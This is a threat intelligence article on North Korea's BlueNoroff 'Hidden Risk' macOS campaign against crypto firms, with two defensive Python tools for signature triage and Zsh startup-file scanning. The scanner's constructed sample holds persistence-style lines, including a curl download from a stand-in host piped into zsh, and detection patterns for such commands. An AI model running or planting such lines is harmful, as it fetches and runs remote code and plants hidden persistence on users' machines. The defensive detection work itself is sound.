North Korean cybercriminals have intensified their focus on the cryptocurrency sector through a new sophisticated malware campaign identified as “Hidden Risk,” according to recent findings by cybersecurity firm SentinelOne. The attack is attributed to the state-sponsored threat actor group known as BlueNoroff, which operates as a subgroup of the notorious Lazarus Group associated with North Korea.
Since July 2024, BlueNoroff has employed targeted email strategies and deceptive PDF lures to attract victims in the cryptocurrency and decentralized finance (DeFi) spaces. These lures often feature fictional news articles with titles such as “Hidden Risk Behind New Surge of Bitcoin Price” and “New Era for Stablecoins and DeFi, CeFi.” The attackers have notably leveraged these techniques to exploit the prevalence of PDF documents as trusted communication tools within the industry.
The operation begins with a carefully crafted phishing email that entices the recipient to click a hyperlink that appears to lead to a PDF document. What the link actually delivers is a malicious application written in Swift, named and presented as if it were the PDF (or a reader for it) but functioning as a dropper for the attackers' backdoor. The application was signed with a valid Apple Developer ID and notarized by Apple, so Gatekeeper lets it run without the warning an unsigned download would produce. Notarization means the bundle passed Apple's automated malware scan at submission time, not that the signer is trustworthy.
Once launched, the application downloads and opens the decoy PDF titled “Hidden Risk” so the victim sees what they expected, while in the background it fetches and executes an x86-64 Mach-O binary identified as “growth” (being Intel-only, it needs Rosetta 2 on Apple silicon Macs). This binary installs itself persistently on the system and acts as the backdoor: it harvests host and user data, maintains communication with a command-and-control server, and executes commands the operators send.
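The point about notarization is worth turning into a concrete triage step. The following is an added example (not SentinelOne's tooling and not an artifact from the campaign) that parses the output of `codesign -dvvv` and `spctl --assess -vv` and refuses a bundle unless its Team ID is on an allowlist; it also flags a download that was supposed to be a document but turns out to contain executable code. The sample tool output, the Team IDs, the bundle identifier and the allowlist are all constructed for the example.

```python
"""Triage a downloaded "PDF" that is really a macOS app bundle.

Added example; not SentinelOne's code and not an artifact from the campaign.
The sample output below is constructed to match the line format of
`codesign -dvvv` and `spctl --assess -vv`, with made-up identifiers.
"""
import subprocess
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Hypothetical allowlist: Apple Team IDs your organization has actually vetted.
TRUSTED_TEAM_IDS = {"ABCDE12345"}

# Constructed sample output (codesign -dvvv writes these lines to stderr).
SAMPLE_CODESIGN = """\
Executable=/Users/me/Downloads/Hidden Risk.app/Contents/MacOS/HiddenRisk
Identifier=com.example.pdfreader
Format=app bundle with Mach-O thin (x86_64)
CodeDirectory v=20500 size=1234 flags=0x10000(runtime) hashes=30+7 location=embedded
TeamIdentifier=ZZ99ZZ99ZZ
Authority=Developer ID Application: Example Corp (ZZ99ZZ99ZZ)
Authority=Developer ID Certification Authority
Authority=Apple Root CA
"""
SAMPLE_SPCTL = (
    "/Users/me/Downloads/Hidden Risk.app: accepted\n"
    "source=Notarized Developer ID\n"
    "origin=Developer ID Application: Example Corp (ZZ99ZZ99ZZ)\n"
)
SAMPLE_PATH = "/Users/me/Downloads/Hidden Risk.app"


@dataclass
class Verdict:
    path: str
    identifier: Optional[str]
    team_id: Optional[str]
    notarized: bool
    reasons: List[str] = field(default_factory=list)

    @property
    def allowed(self) -> bool:
        return not self.reasons


def parse_codesign(output: str) -> Dict[str, str]:
    """Collect the first value of each key=value line from codesign -dvvv."""
    fields: Dict[str, str] = {}
    for line in output.splitlines():
        key, sep, value = line.partition("=")
        if sep:
            fields.setdefault(key.strip(), value.strip())
    return fields


def triage(path: str, codesign_out: str, spctl_out: str,
           expected_document: bool) -> Verdict:
    """Decide whether a bundle may run; notarization alone never suffices."""
    fields = parse_codesign(codesign_out)
    team_id = fields.get("TeamIdentifier")
    if team_id == "not set":  # codesign's wording for ad-hoc signatures
        team_id = None
    notarized = "source=Notarized Developer ID" in spctl_out
    v = Verdict(path, fields.get("Identifier"), team_id, notarized)

    # Notarization proves Apple's scan passed at submission time and that the
    # signer held a developer account; it says nothing about who the signer is.
    if team_id is None:
        v.reasons.append("unsigned or ad-hoc signed")
    elif team_id not in TRUSTED_TEAM_IDS:
        note = " (notarized, but that is not a trust decision)" if notarized else ""
        v.reasons.append(f"signer Team ID {team_id} is not on the allowlist{note}")

    # The user clicked a link to a "PDF": anything containing Mach-O code is a masquerade.
    fmt = fields.get("Format", "")
    if expected_document and ("Mach-O" in fmt or "app bundle" in fmt):
        v.reasons.append(f"expected a document but received executable code ({fmt})")
    return v


def assess(path: str, expected_document: bool = True) -> Verdict:
    """Run the real tools on a macOS host and triage their output."""
    cs = subprocess.run(["codesign", "-dvvv", path], capture_output=True, text=True)
    sp = subprocess.run(["spctl", "--assess", "--type", "execute", "-vv", path],
                        capture_output=True, text=True)
    return triage(path, cs.stderr, sp.stdout + sp.stderr, expected_document)


if __name__ == "__main__":
    for reason in triage(SAMPLE_PATH, SAMPLE_CODESIGN, SAMPLE_SPCTL, True).reasons:
        print("REFUSE:", reason)
```

On a real host, `assess("/Users/me/Downloads/Hidden Risk.app")` runs the tools for you; the verdict prints two refusals for the constructed sample (unknown Team ID despite notarization, and executable code where a document was expected).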
To sustain its presence, the malware modifies the hidden Zsh startup file `.zshenv` in the user's home directory. Unlike `.zshrc`, which only runs for interactive shells, `.zshenv` is sourced by every Zsh invocation, interactive or not, so the backdoor is relaunched whenever any Zsh process starts, including after a reboot. The technique avoids the LaunchAgents and Login Items that most macOS persistence hunting focuses on, and it does not trigger the “Background Items Added” notification that macOS 13 and later display when a LaunchAgent is installed. This choice underscores the attackers’ intent to maintain quiet, long-term access to compromised systems.
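A practitioner hunting for this class of persistence wants to read the Zsh startup files, not just list LaunchAgents. The scanner below is an added example, not SentinelOne's detection logic: it scores each non-comment line of a startup file against a few heuristics (execution from world-writable paths, hidden dot-prefixed files, backgrounding at shell start, downloads piped into a shell, silenced output) and reports lines above a threshold, so a lone reference to `~/.cargo/bin` does not fire while a backgrounded hidden binary in `/Users/Shared` does. Both sample files are constructed; the flagged lines are illustrative and are not the campaign's real payload lines.

```python
"""Score zsh startup files for persistence-style lines.

Added example, not SentinelOne's code. The sample file contents are
constructed; the suspicious lines illustrate the heuristics and are not
the campaign's actual payload.
"""
import os
import re
from dataclasses import dataclass
from typing import List, Tuple

# Files zsh reads at startup. ~/.zshenv is sourced for every invocation,
# interactive or not, which makes it the broadest hook of the set.
ZSH_STARTUP_FILES = ["/etc/zshenv", "/etc/zprofile", "/etc/zshrc",
                     "~/.zshenv", "~/.zprofile", "~/.zshrc"]

# (pattern, weight, explanation). Weights are a judgment call, not a standard.
RULES: List[Tuple[re.Pattern, int, str]] = [
    (re.compile(r"/Users/Shared/|/private/tmp/|/tmp/|/var/tmp/"), 2,
     "runs something from a shared or world-writable path"),
    (re.compile(r"(?:^|[\s/\"'=:])\.(?!\.)[\w-]"), 1,
     "references a hidden (dot-prefixed) file or directory"),
    (re.compile(r"\bnohup\b|\bdisown\b|&\s*$"), 2,
     "backgrounds a process at shell startup"),
    (re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*(?:ba|z)?sh\b"), 3,
     "pipes a download straight into a shell"),
    (re.compile(r"\bxattr\b.*com\.apple\.quarantine|\bchmod\s+\+x\b"), 2,
     "strips quarantine or marks a file executable"),
    (re.compile(r">\s*/dev/null\s+2>&1"), 1,
     "silences all output"),
]
THRESHOLD = 3


@dataclass
class Finding:
    source: str
    lineno: int
    line: str
    score: int
    reasons: List[str]


def scan_text(text: str, source: str = "<inline>") -> List[Finding]:
    """Return every non-comment line whose combined rule weight reaches THRESHOLD."""
    findings: List[Finding] = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        hits = [(w, why) for pat, w, why in RULES if pat.search(line)]
        score = sum(w for w, _ in hits)
        if score >= THRESHOLD:
            findings.append(Finding(source, lineno, line, score, [why for _, why in hits]))
    return findings


def scan_startup_files(paths: List[str] = ZSH_STARTUP_FILES) -> List[Finding]:
    """Scan the real startup files on this host (missing files are skipped)."""
    out: List[Finding] = []
    for p in paths:
        full = os.path.expanduser(p)
        if os.path.isfile(full):
            with open(full, encoding="utf-8", errors="replace") as fh:
                out.extend(scan_text(fh.read(), full))
    return out


# Constructed sample: a typical developer .zshenv that must not fire.
BENIGN_ZSHENV = """\
# constructed benign example
export PATH="$HOME/.cargo/bin:/opt/homebrew/bin:$PATH"
export EDITOR=vim
"""

# Constructed sample: the same file with two persistence-style lines appended.
SUSPICIOUS_ZSHENV = """\
# constructed example; the lines below are illustrative, not the real payload
export PATH="$HOME/.cargo/bin:$PATH"
/Users/Shared/.growth >/dev/null 2>&1 &
curl -fsSL http://example.invalid/i | zsh
"""


if __name__ == "__main__":
    for f in scan_text(SUSPICIOUS_ZSHENV, "sample") + scan_startup_files():
        print(f"{f.source}:{f.lineno} score={f.score} {f.line}")
        for why in f.reasons:
            print("   -", why)
```

Run it on a host and it prints the sample hits followed by anything found in the real startup files; tune `RULES` and `THRESHOLD` to your fleet, and treat a hit as a lead for triage rather than a verdict.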
SentinelOne’s research has tied this campaign closely to BlueNoroff due to the shared tactics reflected in previous operations, including the parsing of commands and the use of hidden files for data exfiltration. Further investigation into the campaign’s infrastructure ties it to domain registrations and services previously exploited by BlueNoroff, reinforcing the linkage. The malware also utilizes a User-Agent string associated with the group’s earlier “RustBucket” malware, further establishing a pattern indicative of their operational methodology.
As BlueNoroff continues to threaten cryptocurrency exchanges, venture capital firms, and banking institutions, the utilization of PDF lures illustrates their strategy of leveraging widely accepted document formats to execute cyberattacks. Recent revelations have also indicated other BlueNoroff-associated malware, such as TodoSwift and ObjCShellz, targeting macOS systems to facilitate remote command execution.
To mitigate exposure to such threats, business owners and their teams should treat unsolicited communications with caution, particularly those from unfamiliar addresses, and verify the source of any email before opening what it links to. On macOS specifically, a “PDF” that turns out to be an application, or one that asks to be opened with a reader it supplies itself, should be refused regardless of whether Gatekeeper accepts it, since a valid Apple signature and notarization indicate only that the bundle passed Apple’s automated checks, not that its author is trustworthy. Keeping security software and the operating system current, and periodically reviewing shell startup files alongside the usual LaunchAgents and Login Items, complements that caution. Given the marked increase in attacks targeting macOS, organizations must prioritize awareness and education around these risks to strengthen their security posture.
The tactics observed in the “Hidden Risk” campaign map onto the MITRE ATT&CK framework: initial access via Phishing: Spearphishing Link (T1566.002) and User Execution: Malicious File (T1204.002); defense evasion via Masquerading (T1036), Subvert Trust Controls: Code Signing (T1553.002) and Gatekeeper Bypass (T1553.001), and Hide Artifacts: Hidden Files and Directories (T1564.001); persistence via Event Triggered Execution: Unix Shell Configuration Modification (T1546.004); and command and control over Application Layer Protocol: Web Protocols (T1071.001). Mapping the campaign this way helps teams check which of these behaviours their existing detections actually cover and prepare for future attacks that reuse them.